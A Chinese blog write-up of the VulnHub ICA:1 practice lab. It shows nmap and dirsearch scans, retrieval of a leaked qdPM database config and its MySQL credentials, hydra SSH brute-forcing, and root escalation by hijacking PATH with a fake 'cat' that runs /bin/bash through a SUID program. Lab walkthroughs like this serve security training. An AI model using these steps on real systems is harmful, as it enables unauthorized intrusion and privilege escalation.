靶场ICA---思路分享

最新推荐文章于 2024-11-02 17:23:36 发布
最新推荐文章于 2024-11-02 17:23:36 发布
阅读量340 收藏
点赞数 9
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jjjjj34/article/details/135054881
版权

目录

下载链接

环境搭建

信息收集

端口扫描

目录扫描

漏洞利用

mysql泄露登录用户密码

ssh爆破

提权

IDA分析

伪造cat提权

qdMP漏洞分析

下载链接

靶场下载链接:https://download.vulnhub.com/ica/ica1.zip

环境搭建

攻击机IP:192.168.4.130

靶机IP:192.168.4.183

信息收集

端口扫描

nmap -sS -sV -T5 192.168.4.183

发现有三个开发端口,我们对80端口的服务进行访问

目录扫描

发现有一个登录页面,我们扫一下其他目录,看看是否有可利用的信息

dirsearch -u http://192.168.4.183

漏洞利用

qdMP 9.2漏洞利用

发现这些目录并没有什么有用的东西,回到登录页面,我发现了一个qdPM的一个登录框架,我们试着搜索一下是否有这个qdPM的漏洞

searchsploit qdMP 9.2

发现有两个可利用文件,我们看第二个文件

这里告诉我们在/core/config/databases.yml文件中可能有我们需要的密码,那么我们就给他下载下来

wget http://192.168.4.183/core/config/databases.yml

mysql泄露登录用户密码

这个文件告诉我们mysql的用户和密码,那么我们登录mysql,看看是否有有用的数据

mysql用户:qdpmadmin 密码:UcVQCMQk2STVeS6J

mysql -u qdpmadmin -h 192.168.4.183 -p

发现password被base64加密了,我们一个一个进行解密,并保存到passwd.txt下,并把用户保存在user.txt下,我当时用这个密码和用户进行ssh爆破,发现啥也爆不出来,只好去看看wp了,发现用户名全部要小写,晕😵

ssh爆破

那么我们就用得到的密码和用户对ssh服务进行爆破。

hydra -L user.txt -P passwd.txt ssh://192.168.4.183

发现爆破出来了两个用户和密码,我们对其进行登录

提权

接下来就是提权了,我们继续进行信息收集,先查看拥有root权限的文件,我们现在就先利用dexter用户

find / -user root -perm -4000 -print 2>/dev/null

发现了一个没见过的文件,我们对其查看一下,因为这是一个程序我们要查看就要用strings进行查看。

发现了一个cat /root/system.info,但是好像并没有其他东西,我们将他拖入到ida里进行分析。

IDA分析

查看主函数main伪代码

这里我们得出cat会以root权限进行查看,那么我们试着伪造cat,当运行/opt/get_access这个文件的时候,我们伪造的cat文件就会拥有root权限从而达到一个提权的作用。

伪造cat提权

我们在/tmp目录下构造一个cat文件

echo /bin/bash > /tmp/cat

chmod 777 cat

echo $PATH

export PATH=/tmp:$PATH

/opt/get_access

提权成功!

qdMP漏洞分析

我们查看源文件,进行分析

通过代码我们可以看到引入了三个文件,我们先对check.php文件进行查看

我们看到这个if语句,他这里会判断是否有databases.yml文件,如果没有将不会重新定向到index.php下,在我们的环境里databases.yml这个文件可以正常地进行访问,从而导致了数据库用户和密码泄露。

YasYs
关注
【Vulnhub靶场】ICA: 1 通关writeup
weixin_44588899的博客
05-22 1135
文章目录环境准备信息搜集漏洞利用权限提升 环境准备 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.132 信息搜集 nmap -T4 -p- -A 192.168.220.132 发现开放22、80、3306端口,先打开80端口,发现cms是qdPM9.2版本,在exp-db搜索漏.
核密度非参数估计的matlab代码-ICA-R-Estimation:ICA模型中混合矩阵的R-Estimator
06-02
核密度非参数估计的matlab代码ICA-R-估计 参考: M. Hallin & C. Mehta (2015)。 非对称独立分量分析的 R 估计。 美国统计协会杂志,110(509),218-232 独立分量分析 (ICA) 是一种多变量统计方法,其中将观察到的...
vulhub ica:1靶场
GRXHunter的博客
04-11 3876
vulhub ica1靶场实测
Vulnhub靶场 ICA: 1
小小猪的博客
09-02 669
nmap进行IP服务扫描,发现开放80,22,3306端口。springs进行字符串查看,发现存在cat命令提权。访问并下载下来,发现里面存在mysql的账号密码。进行ssh爆破,密码需要提前解密,用户名全部是小写。访问80端口,可以看到是qdPM 9.2的框架。登录第二个用户,发现存在提示,说存在可执行文件。可以看到提示,存在一个敏感信息泄露文件。进行ssh登录,查看到第一个flag。kali进行漏洞搜索,发现存在。查看表,查看user表内的数据。进行查找,发现第一个存在可疑。权限提升,查找的flag。
【Vulnhub靶场】ICA: 1
DG_s1mple
03-16 3229
环境准备 把下载好的靶机导入到vmware 按照道理来说,这里会给出ip地址,但是我这没有,就得自己探测了 信息收集 使用arp-scan命令来探测靶机的IP地址 靶机IP地址为:192.168.2.16 攻击机IP地址为:192.168.2.17 使用nmap扫描靶机开放的服务和端口 开放了22,80,3306和一个33060端口 渗透开始 我们首先访问它的网站 是一个比较完善的系统,并且下面给出了框架的版本为9.2 我们在kali搜索一下,看有没有已经公开的漏洞 发现有一个漏洞,我们查看一下
Notes Twenty one days-渗透攻击-红队-权限提升
热门推荐
qq_34801745的博客
10-07 1万+
** Notes Twentieth Day-渗透攻击-红队-权限提升(dayu) ** 作者:大余 时间:2020-10-5 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
VulnHub实战篇一:Billu_Box靶机渗透记录
a1004070060的博客
03-31 1818
0x00前言 由于2020年疫情原因,被迫宅家已有两个月之久,假期里边摸鱼边学习也浪费了不少时光。感叹光阴似箭的同时,临近毕业也加倍地感受到就业的压力。最近听了某位OSCP大佬的安利,决定开始拿VulnHub练练手。 本系列文章用来记录VulnHunb靶机的渗透过程,欢迎各位师傅讨论学习。 0x01靶机信息 靶机名称:Billu_b0x 下载地址:https://downloa...
远控免杀专题(14)-AVIator(VT免杀率25/69)
Ms08067安全实验室
04-06 780
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、远控免杀专题(1)-基础篇:https:...
远控免杀专题(17)-Python-Rootkit免杀(VT免杀率7/69)
Ms08067安全实验室
04-27 948
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1.远控免杀专题(1)-基础篇:https:/...
远控免杀专题(11)-Avoidz免杀(VT免杀率23/71)
Ms08067安全实验室
03-23 863
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!本专题文章导航1、远控免杀...
CICA.rar_ICA-R matlab_cICA Huang matlab_ica-r_matlab cICA_参考ICA
07-15
标题中的"CICA.rar"指的是一个压缩包文件,其主要包含的内容是关于独立成分分析(Independent Component Analysis, 简称ICA)的一种改进算法——迭代类比独立成分分析(Iterated Conditional Algorithms, 简称ICA-R...
ICA.rar_ICA_ICA文章_ICA综述_ica-svm
09-22
"ica-svm"可能指的是ICA与支持向量机(SVM,Support Vector Machine)的一种结合应用,即在SVM模型中使用ICA预处理数据。 ICA的核心思想是假设原始信号是由多个独立且非高斯分布的源信号线性混合而成的。通过算法找...
ICA.rar_ICA_ICA 独立分量分析_ica matlab_ica-svm_独立分量
07-15
在标题“ICA.rar_ICA_ICA 独立分量分析_ica matlab_ica-svm_独立分量”中,我们可以推断这是一个与ICA相关的MATLAB代码资源包,可能包含ICA算法的实现,以及可能结合了支持向量机(SVM)的应用。 在描述中提到“独立...
ica.pca.gabor.rar_ICA_ICA c++_ICA-PCA_主成分分析
09-19
标题"ica.pca.gabor.rar_ICA_ICA c++_ICA-PCA_主成分分析"中,关键词包括“ICA”(独立成分分析),"PCA"(主成分分析)以及"ICA c++",这表明这是一个用C++编程语言实现的、涉及独立成分分析和主成分分析的程序包。...
网络模型——二层转发原理
最新发布
weixin_61967363的博客
11-02 1160
本文章详细介绍了ISO七层网络模型和TCP/IP四层模型,介绍了二层转发的原理。详细解释了交换机转发数据的过程。
嵌入式通信协议:MODBUS简明学习笔记
weixin_73867577的博客
11-02 209
学习Modbus的简明学习笔记
如何使用SOCKS5代理提升匿名性
dailiip1的博客
10-30 883
SOCKS5代理作为一种高效的网络匿名技术,能够为使用者提供多样化的应用场景和显著的隐私保护优势。透过正确配置和合理使用SOCKS5代理,使用者可以有效提升线上安全性,规避潜在的网络监控和攻击风险,享受更安全和自由的网络体验。未来随着网络安全需求的不断增长,SOCKS5代理技术的应用和发展将更加广泛和深入,为用户创造更安全可靠的网络环境。
AIGC时代的网络威胁和防御
qq128252的博客
10-31 955
本文讨论了 AIGC 时代的网络攻击和防御,以及利用大型语言模型打造先进的交互式蜜罐系统。 关键要点包括: - 生成式 AI 成为网络威胁新宠:探讨了其在网络攻击中的滥用,如被网络犯罪分子利用生成和自动化攻击。 - 攻击方法多样:包括 Character Play、Switch Method、OccupyAI 等多种攻击方式。 - 研究结论与应对策略:发现生成式 AI 降低攻击门槛,增加攻击复杂度,提出加强网络安全框架等应对策略。 - 利用 LLM 打造蜜罐系统:介绍了利用 LLM 创建更高效蜜罐系统的研究
嵌入式系统中的网络链接如何实现远程监控和控制
teach2004的博客
10-31 286
随着物联网(IoT)的快速发展,嵌入式系统在各类设备中的应用日益普及。通过网络连接,嵌入式系统能够实现远程监控和控制,为用户带来极大的便利和灵活性。嵌入式系统通过网络链接实现远程监控和控制,极大地提升了设备的智能化和便利性。随着技术的不断进步,未来的嵌入式系统将在各个领域发挥更大的作用。· 数据采集:嵌入式系统定期收集传感器数据,并通过网络将数据发送到服务器。· 工业自动化:工厂通过远程监控设备的状态,实现生产过程的优化和故障预警。· 数据存储:服务器将接收到的数据存储在数据库中,方便后续分析和处理。
深入解析EASI算法及其ICA-R应用
ICA-R JADE是EASI算法的一个实现版本,它使用了随机初始化和Jacobi旋转优化来提高算法的性能和稳定性。EASI算法在信号处理、数据分析和模式识别等领域有着广泛的应用。" EASI算法(Efficient Algorithm for ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值